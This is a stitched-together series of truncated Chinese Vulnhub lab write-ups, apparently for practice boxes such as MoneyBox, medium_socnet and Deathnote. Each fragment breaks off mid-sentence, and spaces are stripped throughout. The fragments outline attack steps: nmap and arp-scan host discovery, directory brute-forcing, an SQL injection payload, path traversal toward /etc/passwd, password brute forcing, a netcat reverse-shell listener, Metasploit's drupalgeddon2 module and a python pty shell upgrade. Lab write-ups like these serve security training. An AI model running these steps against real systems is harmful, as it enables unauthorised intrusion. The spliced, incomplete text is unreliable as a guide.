MoneyBox渗透测试日常练习0x01信息收集一、主机扫描kali有很多工具可以扫描存活主机，像fping，我这里偷一下懒，用nmap直接扫。扫到一个192.168.56.102的主机，开启80，21，22端口。先来访问一下80端口吧。页面上没什么可用信息，继续信息收集。二、遍历目录[14:29:07]301-316B-/blogs->http://192.168.56.102/blogs/这里扫到了一个blogs目录，访问看看。页面还是没什么信息，右键源代码看看。看到最下面有一句话hint说的是有一个S3cr3t-T3xt目录。同样的访问后右键源代码，最下面有一句话这里告诉了我们一个密钥是

medium_socnet从学长那里薅来的靶机，说是基于docker的，挺有意思，那必须搞一下呀！（后面百度才知道这玩意是vulnhub上面的）0x01信息收集一、主机扫描还是老规矩，nmap扫一手。发现192.168.56.101主机，而且22和5000端口是开着的。访问一下5000端口看看有个输入框，输入内容就会回显，这里我尝试丢个弹窗发现会被转义alert(1)暂时不知道有啥用。二、遍历目录dirsearch扫一下dirsearch-uhttp://192.168.56.101:5000/有一个admin目录，访问一下根据页面的提示，说是有一个exec()函数可以执行，叫我们输入代码。这

1.信息收集扫描主机sudoarp-scan-l扫描端口nmap-p-192.168.42.151查看端口服务nmap-A-sV-p21,22,80,801121端口ftp没有有效信息，所以重点在80，80112.漏洞挖掘开始网站浏览没找到有用信息，开始网站目录搜索(因为默认为80端口，所以我们要扫描8011端口)dirbhttp://192.168.42.151dirbhttp://192.168.42.151:8011dirbhttp://192.168.42.151-X.bak查看源代码，发现敏感目录,登录账号catindex.html.bak192.168.42.151/develop

🖳主机发现熟悉的netdiscover-r─$sudonetdiscover-r192.168.234.0/24Currentlyscanning:Finished!|ScreenView:UniqueHosts3CapturedARPReq/Reppackets,from3hosts.Totalsize:180_____________________________________________________________________________IPAtMACAddressCountLenMACVendor/Hostname--------------------------

1.信息收集扫描主机sudoarp-scan-l扫描端口，发现只有80端口nmap-p-192.168.42.150扫描80开放的服务nmap-p80-A-V192.168.42.1502.漏洞发掘访问主页面发现有查找功能，猜测此处有sql注入漏洞测试sql注入漏洞‘or1=1#获取成功，存在注入漏洞，开始利用bp开始抓包，跑sqlmap跑出了admin的账号和密码密码明显长度不太对，猜测为md5加密,在网上在线破解，得到密码admin登录，开始逛街发现下面提示，猜测有文件包含漏洞（目录穿越）不放心可以多敲几个../？file=../../../../../../../../../etc/pa

1.信息收集扫描主机sudoarp-scan-l扫描端口nmap-p-192.168.42.149扫描指纹whatweb192.168.42.149查看端口详细服务nmap-A-p--v192.168.42.1492.网站分析扫描目录dirbuster浏览网站，发现都是静态页面只有contact.php有上传窗口尝试上传，发现问题copyright旁的数字发生变化，猜测thankyou.php存在文件包含包含文件为footer.php3.漏洞利用开始bp测试字段(下面没图了，bp爆破，网站日志太大，无法连接蚁剑，建议大家在此靶场不要跑bp)thankyou.php?file=/ect/pass

HacksudoSearch识别目标主机IP地址(kali㉿kali)-[~/Desktop/Vulnhub/HacksudoSearch]└─$sudonetdiscover-ieth1-r192.168.56.0/24Currentlyscanning:192.168.56.0/24|ScreenView:UniqueHosts3CapturedARPReq/Reppackets,from3hosts.Totalsize:180_____________________________________________________________________________IPAtM

1.信息收集搜索到ipsudoarp-scan-l查看ip开放端口nmap-p-192.168.42.148查找指纹，没有收获查找目录，无敏感信息2.漏洞利用访问网站，发现只有登录框，猜测为弱密码或密码爆破bp爆破成功（为了节省时间，我假设知道username，爆破真的太慢了）账号密码为adminhappy进入网站，测试功能，发现命令执行漏洞bp抓包，开始利用反弹shell（在此之前要在kali中监听）nc-lvp77773.横向渗透反弹成功，得到shell在目录中查找敏感信息，找到oldpassword九头蛇爆破jimshh密码登录ssh，jim在ssh中找到charles账号密码（因为ls

1.扫描主机sudoarp-scan-l扫描端口nmap-p-192.168.42.147扫描主机指纹，发现Drupal7cms2.得到shell（2.1，2.2）只用一种即可2.1开始msf漏洞利用mfconsolesearchdrupalsearch7600useexploit/unix/webapp/drupal_drupalgeddon2setrhosts192.168.42.147run2.2脚本exp得到反弹shell找到脚本，修改脚本，执行脚本nc监听8888端口得到反弹shellpython-c"importpty;pty.spawn('/bin/bash')"美化一下3.me

Deathnote0x01信息收集渗透的第一件事那就是信息收集，虚拟机启动起来，nmap扫一手， 192.168.56.101存在，并且开启了80和22端口，那么就访问页面。但是页面返回的结果是没找到http://deathnote.vuln这个网址 那么根据我做题的经验，这应该是需要绑定域名的，意思就是192.168.56.101跟deathnote.vuln这个域名是绑定在一起的，访问192.168.56.101就会跳转到deathnote.vuln。在windows上配置dnsC:\WINDOWS\system32\drivers\etc的hosts文件加入如下字段（linux上是/et